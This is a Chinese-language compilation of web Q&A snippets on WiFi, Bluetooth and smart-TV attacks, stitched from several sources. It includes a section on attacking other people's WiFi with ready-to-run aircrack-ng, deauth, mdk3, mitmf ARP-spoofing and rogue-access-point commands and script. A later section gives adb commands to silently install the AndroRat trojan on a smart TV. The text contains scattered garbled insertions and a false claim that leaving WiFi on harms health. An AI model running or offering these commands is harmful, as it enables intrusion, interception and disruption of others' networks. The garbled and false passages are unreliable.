㈠ wiFi遭到ARp攻擊,是什麼原因
由於區域網的網路流通不是根據IP地址進行,而是根據MAC地址進行傳輸。所以,MAC地址在A上被偽造成一個不存在的MAC地址,這樣就會導致網路不通,A不能Ping通C!這就是一個簡單的ARP欺騙。
情況一、當區域網內某台主機感染了ARP病毒時,會向本區域網內(指某一網段,比如:10.10.75.0這一段)所有主機發送ARP欺騙攻擊謊稱自己是這個網端的網關設備,讓原本流向網關的流量改道流向病毒主機,造成受害者不能正常上網。
情況二、區域網內有某些用戶使用了ARP欺騙程序(如:網路執法官,QQ盜號軟體等)發送ARP欺騙數據包,致使被攻擊的電腦出現突然不能上網,過一段時間又能上網,反復掉線的現象。
㈡ 黑客如何攻擊公共wifi
我國公共場所免費WiFi不斷增多,然而,由於免費WiFi存在路由器和網路漏洞,成為黑客攻擊的對象,導致網民個人隱私泄露、網銀被盜等案例時有發生。
黑客攻擊公共WiFi最常用三大招式:
1.域名劫持。
在公共的WiFi環境下,進入無線路由器的管理後台,並對域名系統進行修改。當使用者輸入網址時,伺服器直接把IP跳到黑客設置的釣魚網站。
2.釣魚WiFi。
黑客往往選擇在繁華商業區構建一個不加密的WiFi,並把WiFi的名字起一個眾所周知的熱點名稱,引誘網民「上鉤」。
3.ARP(地址解析協議)欺騙。
黑客和使用者同時連接了同一個WiFi,使用者開始上網瀏覽,黑客則在其手機上打開了一款黑客軟體。該黑客軟體很快就進入路由器的WEB管理界面,並將使用者的手機信息讀取出來。
如何防範信息泄露:
一是不要盲目地「見網就連」,防止釣魚的虛假WiFi。
二是不要使用公共WiFi進行網購和網銀操作,避免個人信息的泄露。當用戶發現賬戶被劫持後,應在第一時間退出賬戶,隨後退出WiFi。如果直接退網而不先退出賬戶,緩存的網路數據則不會被清空,將導致黑客可以繼續操控用戶。
㈢ 由無線網路引發的內網入侵
Author: qingxp9
前幾日,一條關於"前員工入侵富士康網路:瘋狂洗白iPhone獲利300萬"的新聞刷爆了網路。員工通過在富士康內部秘密安裝無線路由器的方式侵入了蘋果公司的網路,通過為他人「改機、解鎖」手機共9000餘部,五個月違法所得共計300餘萬元。
這是一個利用企業無線網路達成入侵內網的典型案例。近年來,因無線網路導致的安全事件已經逐漸佔領了新聞的頭條,在某漏洞平台檢索時發現僅2015年便發生了數十起知名企業因WiFi相關安全問題導致內網被入侵的事件,對企業造成了十分惡劣的影響。
我們簡單回顧一下:
到了2016年,無線網路已經成為了企業移動化辦公的重要基礎設施。由於普遍缺乏有效的管理,無線網路也越來越多的成為黑客入侵企業內網的突破口。
回到開頭提到的富士康iphone刷機解鎖事件,通過新聞描述便可大致了解到整個攻擊過程:
攻擊者通過組合使用私接路由器和無線網橋的手法,可以將針對企業內網攻擊的實施范圍擴大到難以想像的幾十公里,極大增強了攻擊的隱秘性,這種攻擊手段值得警惕。
從天巡實驗室長期的測試和對無線網路安全防護的數據和經驗看,WiFi密碼泄漏、釣魚WiFi、私搭亂建WiFi成為目前企業WiFi網路的三大安全隱患。
1、密碼泄漏
WiFi密碼泄漏主要有以下4個方面的原因:
就現階段而言,WiFi密碼被不當分享的問題,已經成為了企業WiFi網路所面臨的最為首要的安全性問題。這主要是因為:考慮到成本和實施復雜度,家庭和小型企業都會選擇採用WPA-PSK加密方案,特點便是所有人使用相同的密碼。家用WiFi網路的使用者一般為3-5人,而企業WiFi網路往往有數十人,甚至成百上千多的人在同時使用,只要有一個人不慎將密碼分享了出來,密碼也就不再是秘密了。
某些第三方WiFi密碼分享平台的產品邏輯也進一步加劇了企業WiFi密碼被「意外分享」的節奏。比如,2015年初,媒體廣泛報道了某個知名的第三方WiFi密碼分享工具可能造成用戶信息泄漏的新聞。報道顯示,該產品在用戶安裝後,會默認勾選「自動分享熱點」選項。使用該軟體的近億用戶一旦接入任何企業的WiFi網路,都會自動的把企業的WiFi密碼分享出去,而這一過程企業網管幾乎完全無法控制和阻止。
2、員工私搭亂建WiFi給企業網路帶來安全隱患
在WiFi技術流行以前,企業內網中的電腦都是通過有線方式進行連接的,企業網路的拓撲結構和網路邊界通常也是固定的。但是,自從WiFi技術普及以來,企業的內網邊界正在變得越來越模糊。特別是私搭亂建的WiFi網路,給企業的內網安全造成了極大的隱患。
一般來說,企業員工私搭亂建WiFi網路主要有以下幾種形式:
私搭亂建的WiFi網路實際上是在那些已經得到准入授權的設備上開放了一個新的入口,使得那些未經授權的設備可以通過這個入口不受限制的接入內網系統,而且管理員往往很難發現。
3、釣魚WiFi是黑客入侵企業網路的重要途徑
2015年央視315晚會上,安全專家現場演示了釣魚WiFi的工作過程。在晚會現場,觀眾加入主辦方指定的一個WiFi網路後,用戶手機上正在使用哪些軟體、用戶通過微信朋友圈瀏覽的照片等信息就都被顯示在了大屏幕上。不僅如此,現場大屏幕上還展示了很多用戶的電子郵箱信息
㈣ 怎麼攻擊別人wifi
1.保密性
我們攻擊WIFI的第一個思路就是從保密性出發,我們希望從無線系統中獲取用戶的明文數據。首先,我們知道WIFI的的認證加密主要有以下四種方式:OPEN(無加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI沒有採取認證加密措施,任意用戶均可鏈接WIFI,用戶數據在BSS(基本服務集)中明文傳輸,惡意用戶沒有任何門檻就可連接,然後通過中間人攻擊即可獲取用戶的數據(SSL、SSH等需要其他工具)。如下圖所示:
WEP、WPA、WPA2認證加密模式的WIFI需要破解獲取密碼,然後通過中間人或直接嗅探的方式獲取用戶明文數據。步驟就不詳述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airomp-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕獲ivs數據包
aireplay-ng -3 -b 目標AP的MAC -h 某一個連接該AP的station的MAC wlan1mon #發送ARP包獲取加速獲取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airomp-ng -w /workspace/sniff/airmon-wpa2 --bssid 目標AP的MAC -c AP所在chanle wlan1mon #嗅探無線數據,抓取handshake包
aireplay-ng -0 5 -a 目標AP的MAC -c 某一連接AP的station的MAC wlan1mon #發送deauth包,更快的獲取handshake
aircrack-ng -w 你的字典文件備老盯 /workspace/sniff/airmon-wpa2.cap #破解wpa2密碼
密碼破解成功後即可連接AP,通過中間人的方式獲取用戶仿和明文數據,或者直接用wireshark抓取加密包,然後通過airdecap-ng工具解密,然後用wireshark讀取已經解密的數據包。
破解WPA、WPA2不一定成功,取決於你字典是否強大,此時我們可以想辦法誘騙用戶主動輸入WIFI密碼,比如我們創建一個和目標AP具有同樣ESSID的軟AP,用戶可以連接上,單在瀏覽網頁時會彈出一個虛假的認證頁面,告訴用戶必須輸入WIFI的密碼,用戶只要輸入密碼我們即可獲取。可以利用fluxion、wifiphisher等工具實現。
wifiphisher將用戶輸入的密碼當做WIFI的密碼,但此密碼並沒有去驗證,如果用戶輸入錯誤,也會提示出該密碼。
而fluxion會將用戶輸入的密碼與handshake校驗,成功方認為獲取到密碼。
2.可用性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性,通常通過DOS攻擊來實現,比如發送大量的deauth包來迫使用戶station與AP解除認證、連接。
aireplay -0 100 -a 目標AP的MAC -c攻擊的station的MAC wlan1mon #發送大量的deauth包,迫使目標station無法連接AP
mdk3 wlan1mon a -a 攻擊AP的MAC #mdk3可以偽造大量的station與AP連接,從而耗盡AP的資源造成DOS攻擊
3.真實性
(1)惡意用戶進入無線系統後,可通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或DNS欺騙,ettercap工具非常方便。下面採用mitmf工具通過ARP欺騙將目標瀏覽網頁中的所有圖片上下顛倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通過driftnet工具抓取目標瀏覽網頁含桐時的圖片
driftnet -i wlan0
當然還可以利用中間人攻擊做很多事情,比如獲取cookie,嵌入js,結合beef進一步攻擊等等。。。
(2)偽造AP進行釣魚攻擊
airbase -ng -e airmon wlan1mon #創建釣魚熱點
然後通過下面的腳本開啟dhcp伺服器(必須先安裝isc-dhcp-server),開啟路由,開啟系統轉發,開啟防火牆nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up10 ifconfig at0 10.0.0.1 netmask 255.255.255.011 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.112 sysctl net.ipv4.ip_forward=113 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at015 echo '等待啟動dhcp伺服器...'16 sleep 517 service isc-dhcp-server start18 19 iptables -F20 iptables -t nat -F21 22 #iptables -P FORWARD ACCEPT23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此時用戶可以不用密碼即可連接airmon熱點,並可以上網,但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整性
篡改用戶數據,在WIFI攻擊這塊貌似用處不大。
5.不可抵賴性
㈤ 長期開著Wi-Fi和藍牙安全嗎
非常不安全。
一、WiFi危害
1、竊聽。非授權者竊聽無線站點和AP(Access Point,無線訪問節點,無線基站)之間發送的無線電信號,這種方式屬於被動攻擊,無線區域網比有線區域網更加容易,而且不易被發現。
2、非授權訪問。非授權的訪問包括兩種方式,一是入侵者可以偽裝成授權用戶進入無線網路,二是入侵者可以設置一個偽造的AP來欺騙無線站點,而偽造AP通常是攻擊的第一步,這之後通常可進行如下攻擊:中間人攻擊,獲取用戶上網信息和數據,盜取登錄密碼和隱藏信息;
3、人為干擾。攻擊者使用高功率的發射機,或DDOS攻擊。從而導致用戶的帶寬嚴重下降。這些多種攻擊方式都讓Wi-Fi並不安全,我們在日常的使用過程中,一定要注意提高安全意識。
4、對身體的傷害。長期開著wifi設備直接影響身體健康,早上起來會感覺頭暈腦脹,身體比較難受。
二、藍牙的危害
1、重放攻擊:一個攻擊者可以記錄藍牙傳輸過程中所有79個信道,並通過某種方式計算出跳頻時序,偽造一個重復請求,來重復已授權的命令實施重放攻擊。
2、位置攻擊:藍牙設備有惟一的標識序列,這使確定藍牙用戶的位置成為可能。攻擊者能識別並且確定受攻擊設備的地理位置,當被攻擊設備處於可發現模式甚至在被攻擊者已經和其它設備已經建立通訊時,攻擊者都可以通過網路通訊內容而得到用戶的行蹤。
3、通過Wi-Fi和藍牙都可以建立一個網路,雖然使用起來很方便,但是還會面臨諸多威脅,特定類型的病毒等也可能會通過這種無線網路方式傳播,我們在使用的過程中不能一直敞開連接,它們並非像我們想像的那麼安全,一定要提高安全意識。
(5)wifi無線網路攻擊方式擴展閱讀:
1、調制方式是GFSK(高斯頻移鍵控),可以同時進行數據和語音的無線通信,通信距離一般是10米,現在最新傳輸距離可以達到50米。
2、藍牙功能無處不在,手機、電腦等很多電子設備都設藍牙模式。成為電子設備軟體。主要提供數據連接、傳送文件等功能 。
3、而wifi所使用的協議時區域網協議,它的傳輸范圍100米,速度最大可以達到11Mbps,使的是DSSS(直序列擴頻)和QPSK或BPSK(相移鍵控),帶寬是22MHz。
4、主要提供的是無線上網業務,因此經常可以在需要無線移動上網的設備中看到它的身影,比如筆記本,PDA,智能手機等。
5、藍牙屬於無線個域網,即點對點,兩者之間的關系。而wifi屬於無線區域網,多個終端同時傳輸的網路模式。
㈥ 怎麼可以把宿舍的wifi密碼破開
1. 想破解宿舍的人的WiFi密碼有什麼辦法嗎~求神人幫幫忙
WIFI密碼沒有想像的那麼輕松容易破解的,只要有安全意識的人把密碼位數設置多些,復雜些,一般的破解軟體是沒有辦法破解的,而且亂下破解軟體要小心以防中毒和木馬。
建議用萬能鑰匙嘗試一下,如果對方以共享密碼那麼就可以直接連接了。(首先要明白萬能鑰匙不是破解密碼,而是分享了共享者的密碼。)
如果是要蹭網的話那麼不需要知道無線熱點密碼,下載一些蹭網軟體就可以蹭網的了,但是蹭網不是破解密碼,蹭網軟體只是獲取網上網友分享的wifi密碼然後自動連wifi上網而已;如果wifi熱點密碼設置很復雜,無人分享那麼就是無法蹭網的,wifi熱點密碼只能詢問wifi熱點主人。
2. 如何才能把加密的wifi給破開
破解WIFI密碼
事實總是殘酷的,不過只能告訴你真相。
1、以現有的技術手段,是沒有辦法破解WPA的加密方式(現在基本上全部WIFI的加密方式),WPA的加密方式安全性很高,根本就破不了。
2、即使破解密碼,人家也有可能設置了MAC地址過濾,你還是上不去。
3、網上的所謂破解密碼軟體,全部都是騙人的,要麼浪費你的流量,要麼根本就是木馬,要小心下載使用。
4、可以下個WIFI萬能鑰匙,但那個軟體只是能上別人分享過的熱點,如果熱點沒被分享過,根本就上不了。
5、也可破解些簡單的數字密碼。比如12345678之類的密碼。
3. 如何破解隔壁宿舍的無線網路
WPA加密方式正在保護無線網路!WPA(或許也叫WPA2)是目前最常見的無線區域網加密協議,一般家庭使用的是WPA-PSK模式,其中PSK是指預共享密鑰的意思,我們這里不討論WPA-PSK的工作原理,我來談談關於入侵這類型加密的原理。
通俗一點說,就是破解Wi-Fi密碼,不知覺的進入別人的內網進行活動。那麼怎樣破解密碼呢?破解WPA-PSK密碼分為兩個部分:抓包和離線暴力攻擊。
抓包是指獲取握手包,WPA加密方式包含四次握手,四次握手允許客戶端(也就是手機、筆記本等通過無線網路連接的設備。)和AP(接入點,可以理解為網路入口或者路由器。)
對無線傳送的流量進行加密,所以握手包裡面會包含密文。四次握手發生在客戶端與AP的配兄認證過程中,例如你打開手機的Wi-Fi功能後,手機顯示「驗證身份」、「正在獲取IP地址」,其實在這幾秒鍾內,手機與AP正在發生四次握手。
這幾秒鍾非常重要,黑客通過計算機網卡截獲這些數據包,並保存下來,這就完成了抓包的過程。但是這里有一個問題,這種抓包方式太被動了,因為要恰好碰上客戶端接上網路的瞬間,時間只有僅僅的幾秒,這會讓黑客失去耐心。
不過有時候失去耐心反而是最好的,因為黑客會想方設法的讓客戶端重新進行四次握手的過程。如何讓客戶端重新連接網路呢?就是踢他下線!通過802.11拒絕服斗汪務攻擊,可以讓一個客戶端斷線。
原理就是黑客的計算機網卡發送一組「解除認證數據包」給客戶端,這時客戶端就會斷開與AP的連線,並且重新進行四次握手,這樣黑客就能完成抓包的過程。但是,想要抓取四次握空賣仔手的數據包並非易事,需要多次的嘗試,這意味著黑客需要不斷的發送「解除認證數據包」,有的時候一個「解除認證數據包」就完事了,也有的時候,幾十萬個「解除認證數據包」也不能讓黑客得到握手包。
所以,拒絕服務攻擊常常被形象的稱為洪水般的攻擊。你應該注意到了,四次握手的對象是AP與客戶端,也就意味著如果沒有客戶端,那麼黑客將束手無策,至少他不得不費更多的時間。
也就是說,如果家庭開著路由器,但是沒有手機、筆記本等連接這個網路,那麼對於黑客來說,這不是攻擊WPA的好時機!黑客會懊惱的發現,在顯示屏的DATA(數據包)那一欄的數值永遠是0。完成抓包,剩下的任務就是離線暴力攻擊,這個過程不需要與網路進行交互,也就是說黑客只需要保存這個握手包,他就可以在地球任一個角落進行暴力攻擊。
這也解釋了離線的意思。暴力攻擊也稱為字典攻擊,原理是通過事先保存的密碼表一一驗算這個握手包包含的密文,這個密碼表形象稱為字典,為什麼?因為這個密碼表非常大,包含了常見的密碼組合。
但是WPA-PSK的密文十分具有挑戰性,如果密碼組合十分復雜,你會發現即使花了大量的時間,但還在原地踏步。不巧的是,如果密碼表不包含真正的密碼,那麼就意味著暴力攻擊失效了。
目前緩解這種壓力的方法有兩個,第一就是增加密碼表的容量,使它能夠組合出真正的密碼,第二就是加快驗證速度,縮短等待時間。目前個人電腦的中央處理器每秒鍾能夠破解200個密碼左右,而利用高性能的顯卡能夠達到每秒鍾10000個密碼左右的速度。
不過令人懊惱的是,一份普通的密碼表就包含2的18次方個密碼,跑完整套密碼表需要很多時間。總結一下,破解WPA密碼包含兩個過程,首先是獲得握手包,然後再暴力攻擊這個握手包從而獲得密碼。
事實上,這兩個過程非常耗時間,只要密碼足夠復雜,那麼要破解WPA可以認為是不可能。談談個人溫馨提示:也許你想嘗試破解WPA密碼,在網上搜索你就會發現很多密碼破解的教程。
但是千萬不要被那些花俏的語言迷惑了你,那些多種多樣的教程本質上就是上文提到的兩個過程。我查閱了相關資料,截至2012年(書的出版日期),已知的攻擊WPA的方法只有這一個,所以你還是別太相信網路上面的教程。
另外,不要下載網上的關於破解WPA的軟體,因為那都是騙人的。目前Windows操作系統不支持網卡監控模式(也叫戰爭模式。)
而網卡只有處於監控模式才能截取到握手包,也就意味著在Windows平台一般是不能完成抓包工作的。所以網上的關於破解Wi-Fi密碼這一類軟體十有八九都是假的。
這里簡略的說說破解過程。一般完成抓包工作需要Linux操作系統,經典的是使用BT3操作系統或者BEMEI奶瓶操作系統。
這就需要你有一定的在計算機安裝操作系統的知識,以及關於Linux命令行的知識,這里我就不詳談,你可以網路一下關於BT3、奶瓶操作系統的教程。而離線暴力攻擊可以在任何平 *** 成,即使在Windows操作系統下也可以完成的,這些你也可以網路一下。
不得不告訴你,WPA密碼十分具有挑戰性,破解這類密碼沒有百分百的把握,前提是密碼表包含了真正的密碼。所以家庭裡面不用擔心有人蹭網了,只要密碼足夠復雜,那麼黑客是很難通過這種方法破解WPA密碼,所以說啊,WPA是目前最好的網路加密方法。
盡管WPA足夠安全,但是黑客早已失去了對WPA的興趣,現在最新的攻擊是繞過WPA機制,轉而對客戶端的攻擊,通過軟體漏洞、ARP欺詐、DNS拒絕服務等等。
㈦ 你知道嗎智能電視黑客攻擊方式的四種
針對智能電視的黑客攻擊方法大致可以分為四種: 1.WiFi網路攻擊 智能電視要在足夠帶寬的 WiFi 環境工作,WiFi 是智能電視第一道安全關卡。如果 WiFi 被破解,那麼包括智能電視、手機、Pad、PC 等所有設備都危險了。 攻擊者通過無線網路破解工具破解 WiFi 密碼連接到內部網路,然後掃描區域網埠,如有開放 5555 埠(Android 默認遠程調試埠)為 AndroidTV 出廠設置遠程調試埠,通過該埠進行對智能電視的系統進行安裝,卸載,修改應用。 然後通過區域網遠程埠進行連接到智能電視,並安裝惡意軟體或其它操作: (1)adb connect 192.168.0.111:5555 (2)adb push su /system/xbin pm set-install-location 0 (su 工具通過 root 許可權運行後可以進行靜默安裝,在屏幕上無顯示界面) (3)adb install superuser.apk (超級用戶授權工具) (4)adb install busybox.apk (系統命令執行工具箱) (5)adb install AndroRat.apk(Android 遠程式控制制木馬) (6)通過服務端進行控制 通過 WiFi 網路攻擊,攻擊者可以對智能電視進行任意操作,如更換頻道,惡意彈窗,安裝惡意軟體,關閉智能電視,甚至對智能電視固件進行升級導致電視機變成板磚的可能。 從問題截圖來看,對方(鄰居?)應該是先破解了這位同學 WiFi 的密碼,然後就可以隨意控制電視顯示內容了。並沒有多高的技術含量。她要做的是盡快改一個復雜的 WiFi 密碼,並且把 WPS/QSS 功能關閉。 2.內網欺騙攻擊 該攻擊方法與其他 PC 攻擊方法大同小異,通過內部網路的 DNS 攻擊,ARP 欺騙,對智能電視播放的 APK 進行二次打包覆蓋安裝,對廠商開機廣告投放進行篡改。一般廣告投放時通過網頁調用一個遠程伺服器的 JS 代碼,通過劫持或者緩存投毒方式對 JS 代碼進行相應的修改。 3.智能電視應用遠程伺服器受攻擊導致展示廣告被修改、付費欄目免費使用、及企業網路進行滲透。 這也屬於傳統的攻擊方法之一,對遠程伺服器進行掃描發現漏洞後通過利用相應漏洞控制伺服器。一般遠程伺服器上有多個 web 應用提供服務,Android 智能電視載入 web 頁面時候使用了 Android 原生瀏覽器 webview 組件才能載入頁面。 這個組件存在很多代碼注入,遠程代碼執行等問題,所以攻擊者對載入的頁面中嵌入精心構造的惡意腳本會在智能電視載入應用的網頁時候惡意代碼執行,導致 Android 遠控木馬(androrat)會在智能電視機系統里 root 超級用戶模式神不知鬼不覺的靜默安裝。 一些應用程序使用了 Android webkit 模塊實現遠程網頁載入的功能,所以存在和傳統 web 應用一樣的漏洞,遠程代碼執行,SQL 注入攻擊,此外還有一些其它的跨站腳本,上傳文件,本地或遠程包含漏洞。在一般付費用戶的在後台上進行添加刪除操作,攻擊了遠程伺服器,就能通過資料庫輕松修改,把免費用戶改成 VIP 用戶都不是問題。 除了這方面,Android 系統原生瀏覽器的漏洞導致致命的遠程代碼執行漏洞會感染整個智能電視,智能電視在感染後對整個區域網進行跳板攻擊,這時傳統殺毒軟體無法在智能電視上工作,任由病毒發作。 如果智能電視在企業內網工作,那將是個非常大的安全隱患。受感染的智能電視可以通過 NC(黑客瑞士軍刀)轉發內網的埠到遠程伺服器上,從外網滲透至企業用於廣告宣傳或者投放的電視機中,長時間在企業內部網路漫遊,從而達到進一步攻擊的目的。這已經不是假設性的攻擊思路,而是可以在真實環境中危害到企業安全的一個致命威脅。 4.其他攻擊方法 智能電視可以外接很多附件產品,如攝像頭(mic、錄制)的控制,還有大部分智能電視支持 USB 介面,通過感染 USB 寫入 autorun 等攜帶式設備自動播放功能從而進行跳板攻擊其它 Windows 主機等可能,雖然是小概率事件但也不能排除完全不會發生。 除了這些功能外,智能電視的 rom 製作過程中也可能被插入木馬後門,類似一些山寨 Android 智能手機預置了 oldboot 木馬的情況。智能手機發生過的安全問題,都可能會在智能電視上重現。